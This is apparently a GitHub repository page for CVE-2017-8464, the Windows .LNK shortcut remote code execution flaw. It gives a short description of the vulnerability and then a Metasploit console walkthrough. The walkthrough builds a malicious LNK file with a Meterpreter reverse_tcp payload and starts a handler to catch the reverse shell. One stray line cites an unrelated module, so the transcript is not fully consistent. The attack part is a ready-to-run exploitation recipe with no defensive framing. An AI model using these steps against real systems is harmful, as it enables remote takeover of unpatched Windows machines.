Skip to content

Latest commit

 

History

History

CVE-2017-8464

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

CVE-2017-8464

Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, 
Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 
allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled 
during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 
aka "LNK Remote Code Execution Vulnerability."

Vulnerability reference:

load the module within the Metasploit

msf

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run
msf exploit(ms10_092_schelevator) > exploit

msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <local-ip>
msf exploit(handler) > set lport 8988
msf exploit(handler) > run